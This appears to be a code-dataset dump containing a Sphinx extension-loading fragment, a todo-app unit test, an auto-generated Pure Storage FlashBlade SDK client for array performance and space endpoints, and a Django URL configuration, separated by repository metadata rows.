'a Sphinx extension module?'), extname)
metadata = {} # type: Dict[unicode, Any]
else:
try:
metadata = mod.setup(app)
except VersionRequirementError as err:
# add the extension name to the version required
raise VersionRequirementError(
__('The %s extension used by this project needs at least '
'Sphinx v%s; it therefore cannot be built with this '
'version.') % (extname, err)
)
if metadata is None:
metadata = {}
if extname == 'rst2pdf.pdfbuilder':
metadata['parallel_read_safe'] = True
elif not isinstance(metadata, dict):
logger.warning(__('extension %r returned an unsupported object from '
'its setup() function; it should return None or a '
'metadata dictionary'), extname)
metadata = {}
app.extensions[extname] = Extension(extname, mod, **metadata)
app._setting_up_extension.pop()
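# A minimal sketch of the extension contract load_extension() expects;
# `myext` and MyBuilder are hypothetical:
#
#   # myext.py
#   def setup(app):
#       app.add_builder(MyBuilder)   # Sphinx routes this to add_builder() above
#       return {'version': '0.1', 'parallel_read_safe': True}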
|
[
"davidelarsen@live.com"
] |
davidelarsen@live.com
|
3f37df8301b6e1dbb044c648cb837c0f03ffdbc6
|
a1582cec6239f627c6740b391d751f429675ee39
|
/test_todo.py
|
039a3c22c18438751c553f7c5c877b02e940182e
|
[] |
no_license
|
SolbiatiAlessandro/todos
|
7cabfd35d6c7d3cdd3232051be4a96c667d55f21
|
b85e74c4fc220dccc5a0a05a288465b2da98f6d0
|
refs/heads/master
| 2020-03-28T18:56:09.847298
| 2018-10-15T15:07:01
| 2018-10-15T15:07:01
| 148,928,531
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 638
|
py
|
import unittest
import todo
from os import path
dir_path = path.dirname(path.realpath(__file__))
class testTODO( unittest.TestCase ):
def test_readElems( self ):
self.assertIsNotNone( todo.readElems() )
def test_todoDone( self ):
with open(dir_path+'/todos','a') as f:
f.write('"[test elem]" 0')
#import pdb;pdb.set_trace()
elems = todo.readElems()
self.assertEqual( "[test elem]", elems[0][1] )
todo.todoDone()
elems = todo.readElems()
self.assertNotEqual( "[test elem]", elems[0][1] )
if __name__ == '__main__':
unittest.main()
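# Run sketch: `python -m unittest test_todo` from this directory; the
# test appends a marker line to the sibling `todos` file and expects
# todo.todoDone() to remove it from the top of the list.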
|
[
"alexsolbiati@hotmail.it"
] |
alexsolbiati@hotmail.it
|
19ebe0e0280c2829c58678866cdc0eb3a1da7611
|
bbe6f37f7347cb83f08846d505ac4aa6bc0031e6
|
/purity_fb/purity_fb_1dot9/apis/arrays_api.py
|
7bd8335e17e2cf1d85d4d5361d2a51ff900af97e
|
[
"Apache-2.0"
] |
permissive
|
bsamz-ps/purity_fb_python_client
|
02ff7213075cf1948e2db7b0835cc5fcc56f328a
|
11f27ef0c72d8aac1fc4e1ed036cca038b85dfa4
|
refs/heads/master
| 2021-02-19T08:11:04.042758
| 2020-02-12T23:56:08
| 2020-02-12T23:56:08
| 245,294,511
| 0
| 0
|
NOASSERTION
| 2020-03-06T00:14:27
| 2020-03-06T00:14:26
| null |
UTF-8
|
Python
| false
| false
| 43,419
|
py
|
# coding: utf-8
"""
Pure Storage FlashBlade REST 1.9 Python SDK
Pure Storage FlashBlade REST 1.9 Python SDK. Compatible with REST API versions 1.0 - 1.9. Developed by [Pure Storage, Inc](http://www.purestorage.com/). Documentations can be found at [purity-fb.readthedocs.io](http://purity-fb.readthedocs.io/).
OpenAPI spec version: 1.9
Contact: info@purestorage.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class ArraysApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def list_arrays(self, **kwargs):
"""
List arrays
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: ArrayResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_arrays_with_http_info(**kwargs)
else:
(data) = self.list_arrays_with_http_info(**kwargs)
return data
def list_arrays_with_http_info(self, **kwargs):
"""
List arrays
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: ArrayResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_arrays" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.9/arrays', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
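    # Usage sketch (credentials/host are configured on the ApiClient;
    # `api` and `some_callback` are hypothetical):
    #
    #   api = ArraysApi()
    #   print(api.list_arrays())                 # synchronous ArrayResponse
    #   api.list_arrays(callback=some_callback)  # returns the request thread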
def list_arrays_http_specific_performance(self, **kwargs):
"""
List instant or historical http specific performance
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_http_specific_performance(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int start_time: Time to start sample in milliseconds since epoch.
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:return: ArrayHttpPerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_arrays_http_specific_performance_with_http_info(**kwargs)
else:
(data) = self.list_arrays_http_specific_performance_with_http_info(**kwargs)
return data
def list_arrays_http_specific_performance_with_http_info(self, **kwargs):
"""
List instant or historical http specific performance
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_http_specific_performance_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int start_time: Time to start sample in milliseconds since epoch.
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:return: ArrayHttpPerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['start_time', 'end_time', 'resolution']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_arrays_http_specific_performance" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'start_time' in params:
query_params.append(('start_time', params['start_time']))
if 'end_time' in params:
query_params.append(('end_time', params['end_time']))
if 'resolution' in params:
query_params.append(('resolution', params['resolution']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.9/arrays/http-specific-performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayHttpPerformanceResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_arrays_nfs_specific_performance(self, **kwargs):
"""
List instant or historical nfs specific performance
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_nfs_specific_performance(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int start_time: Time to start sample in milliseconds since epoch.
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:return: ArrayNfsPerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_arrays_nfs_specific_performance_with_http_info(**kwargs)
else:
(data) = self.list_arrays_nfs_specific_performance_with_http_info(**kwargs)
return data
def list_arrays_nfs_specific_performance_with_http_info(self, **kwargs):
"""
List instant or historical nfs specific performance
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_nfs_specific_performance_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int start_time: Time to start sample in milliseconds since epoch.
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:return: ArrayNfsPerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['start_time', 'end_time', 'resolution']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_arrays_nfs_specific_performance" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'start_time' in params:
query_params.append(('start_time', params['start_time']))
if 'end_time' in params:
query_params.append(('end_time', params['end_time']))
if 'resolution' in params:
query_params.append(('resolution', params['resolution']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.9/arrays/nfs-specific-performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayNfsPerformanceResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_arrays_performance(self, **kwargs):
"""
List instant or historical array performance
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_performance(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int start_time: Time to start sample in milliseconds since epoch.
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:param str protocol: to sample performance of a certain protocol
:return: ArrayPerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_arrays_performance_with_http_info(**kwargs)
else:
(data) = self.list_arrays_performance_with_http_info(**kwargs)
return data
def list_arrays_performance_with_http_info(self, **kwargs):
"""
List instant or historical array performance
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_performance_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int start_time: Time to start sample in milliseconds since epoch.
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:param str protocol: to sample performance of a certain protocol
:return: ArrayPerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['start_time', 'end_time', 'resolution', 'protocol']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_arrays_performance" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'start_time' in params:
query_params.append(('start_time', params['start_time']))
if 'end_time' in params:
query_params.append(('end_time', params['end_time']))
if 'resolution' in params:
query_params.append(('resolution', params['resolution']))
if 'protocol' in params:
query_params.append(('protocol', params['protocol']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.9/arrays/performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayPerformanceResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_arrays_performance_replication(self, **kwargs):
"""
List instant or historical array replication performance.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_performance_replication(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:param int start_time: Time to start sample in milliseconds since epoch.
:param str type: to sample space of either file systems, object store, or all
:return: ArrayPerformanceReplicationResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_arrays_performance_replication_with_http_info(**kwargs)
else:
(data) = self.list_arrays_performance_replication_with_http_info(**kwargs)
return data
def list_arrays_performance_replication_with_http_info(self, **kwargs):
"""
List instant or historical array replication performance.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_performance_replication_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:param int start_time: Time to start sample in milliseconds since epoch.
:param str type: to sample space of either file systems, object store, or all
:return: ArrayPerformanceReplicationResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['end_time', 'resolution', 'start_time', 'type']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_arrays_performance_replication" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'end_time' in params:
query_params.append(('end_time', params['end_time']))
if 'resolution' in params:
query_params.append(('resolution', params['resolution']))
if 'start_time' in params:
query_params.append(('start_time', params['start_time']))
if 'type' in params:
query_params.append(('type', params['type']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.9/arrays/performance/replication', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayPerformanceReplicationResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_arrays_s3_specific_performance(self, **kwargs):
"""
List instant or historical object store specific performance
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_s3_specific_performance(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int start_time: Time to start sample in milliseconds since epoch.
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:return: ArrayS3PerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_arrays_s3_specific_performance_with_http_info(**kwargs)
else:
(data) = self.list_arrays_s3_specific_performance_with_http_info(**kwargs)
return data
def list_arrays_s3_specific_performance_with_http_info(self, **kwargs):
"""
List instant or historical object store specific performance
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_s3_specific_performance_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int start_time: Time to start sample in milliseconds since epoch.
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:return: ArrayS3PerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['start_time', 'end_time', 'resolution']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_arrays_s3_specific_performance" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'start_time' in params:
query_params.append(('start_time', params['start_time']))
if 'end_time' in params:
query_params.append(('end_time', params['end_time']))
if 'resolution' in params:
query_params.append(('resolution', params['resolution']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.9/arrays/s3-specific-performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayS3PerformanceResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_arrays_space(self, **kwargs):
"""
List instant or historical array space
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_space(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int start_time: Time to start sample in milliseconds since epoch.
:param int end_time: Time to end sample in milliseconds since epoch.
        :param int resolution: Sample frequency in milliseconds.
        :param str type: Type of space to sample: file systems, object store, or all.
:return: ArraySpaceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_arrays_space_with_http_info(**kwargs)
else:
(data) = self.list_arrays_space_with_http_info(**kwargs)
return data
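    # Illustrative usage of the wrapper above (a sketch: assumes `api` is an
    # authenticated instance of this API class; timestamps are epoch
    # milliseconds, and the accepted `type` values are the REST API's own):
    #
    # >>> space = api.list_arrays_space()                  # instant sample
    # >>> space = api.list_arrays_space(start_time=1500000000000,
    # ...                               end_time=1500003600000,
    # ...                               resolution=30000)  # one hour at 30 s steps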
def list_arrays_space_with_http_info(self, **kwargs):
"""
List instant or historical array space
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_space_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int start_time: Time to start sample in milliseconds since epoch.
:param int end_time: Time to end sample in milliseconds since epoch.
        :param int resolution: Sample frequency in milliseconds.
        :param str type: Type of space to sample: file systems, object store, or all.
:return: ArraySpaceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['start_time', 'end_time', 'resolution', 'type']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_arrays_space" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'start_time' in params:
query_params.append(('start_time', params['start_time']))
if 'end_time' in params:
query_params.append(('end_time', params['end_time']))
if 'resolution' in params:
query_params.append(('resolution', params['resolution']))
if 'type' in params:
query_params.append(('type', params['type']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.9/arrays/space', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArraySpaceResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_clients_performance(self, **kwargs):
"""
List client performance
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_clients_performance(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
        :param list[str] names: A comma-separated list of resource names. This cannot be provided together with the `ids` query parameter.
        :param str filter: The filter to be used for query.
        :param str sort: The way to order the results.
        :param int limit: Maximum number of records to return; must be >= 0.
:return: ClientPerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_clients_performance_with_http_info(**kwargs)
else:
(data) = self.list_clients_performance_with_http_info(**kwargs)
return data
def list_clients_performance_with_http_info(self, **kwargs):
"""
List client performance
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_clients_performance_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
        :param list[str] names: A comma-separated list of resource names. This cannot be provided together with the `ids` query parameter.
        :param str filter: The filter to be used for query.
        :param str sort: The way to order the results.
        :param int limit: Maximum number of records to return; must be >= 0.
:return: ClientPerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['names', 'filter', 'sort', 'limit']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_clients_performance" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'names' in params:
query_params.append(('names', params['names']))
collection_formats['names'] = 'csv'
if 'filter' in params:
query_params.append(('filter', params['filter']))
if 'sort' in params:
query_params.append(('sort', params['sort']))
if 'limit' in params:
query_params.append(('limit', params['limit']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.9/arrays/clients/performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ClientPerformanceResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
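    # Illustrative usage (a sketch: assumes `api` is an authenticated
    # instance of this API class; the sort key below is a placeholder, since
    # the valid field names come from the REST API itself):
    #
    # >>> perf = api.list_clients_performance(names=['client1', 'client2'])
    # >>> top10 = api.list_clients_performance(sort='write_bytes_per_sec',
    # ...                                      limit=10)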
def update_arrays(self, array_settings, **kwargs):
"""
Update arrays
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_arrays(array_settings, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param PureArray array_settings: (required)
:return: ArrayResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_arrays_with_http_info(array_settings, **kwargs)
else:
(data) = self.update_arrays_with_http_info(array_settings, **kwargs)
return data
def update_arrays_with_http_info(self, array_settings, **kwargs):
"""
Update arrays
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_arrays_with_http_info(array_settings, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param PureArray array_settings: (required)
:return: ArrayResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['array_settings']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_arrays" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'array_settings' is set
if ('array_settings' not in params) or (params['array_settings'] is None):
raise ValueError("Missing the required parameter `array_settings` when calling `update_arrays`")
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'array_settings' in params:
body_params = params['array_settings']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.9/arrays', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
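    # Illustrative usage (a sketch: assumes `api` is an authenticated
    # instance of this API class and that the generated PureArray model is
    # importable from the client package; the `name` field is an assumption):
    #
    # >>> settings = PureArray(name='new-array-name')  # hypothetical field
    # >>> renamed = api.update_arrays(settings)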
authors: ["tlewis@purestorage.com"] | author_id: tlewis@purestorage.com

blob_id: d41c0a0dcfbff280e11e9fa43fbd1a64b889ce22 | directory_id: 6444935a3e304e0d8f0fc4cf7fbb7153621cfc53
path: /technosphere_python_backend/homeworks/06_07/project/project/urls.py | content_id: 6f1f921969039500acc29fa06730692f4e48846f
detected_licenses: [] | license_type: no_license | repo_name: SVasi1yev/other
snapshot_id: d1032871dc36a22cc2b556d4cbf6c0dc0c968e87 | revision_id: 1c31090e7b3e0ff04e00b4f5b0b7ac917fe83ed2 | branch_name: refs/heads/master
visit_date: 2023-08-04T16:28:05.163894 | revision_date: 2023-07-17T14:32:09 | committer_date: 2023-07-17T14:32:09
github_id: 138393326 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 1141 | extension: py
"""project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.contrib.auth import views as auth_views
import sys
sys.path.append('..')
from forum import views
urlpatterns = [
path('admin/', admin.site.urls),
path('forum/', include('forum.urls')),
path('login/', views.login, name='login'),
path('logout/', auth_views.LogoutView.as_view(), name='logout'),
path('social_auth/', include('social_django.urls', namespace='social')),
path('', views.home, name='home')
]
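# For reference, a minimal `forum/urls.py` that the include() above would
# pull in (an illustrative sketch, not the project's actual module; the
# `views.index` name is hypothetical):
#
#   from django.urls import path
#   from . import views
#
#   urlpatterns = [
#       path('', views.index, name='forum-index'),
#   ]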
authors: ["vsemenm@gmail.com"] | author_id: vsemenm@gmail.com

blob_id: d9b1642074ff790c14fedd3afa80bc618136166c | directory_id: 2191d0e0d9fbec3dcef93386ba6c691d222bfed4
path: /new_user/migrations/0015_auto_20170428_1826.py | content_id: 5aed1ff9f421cb90cdfeb799f1cda59759a131cd
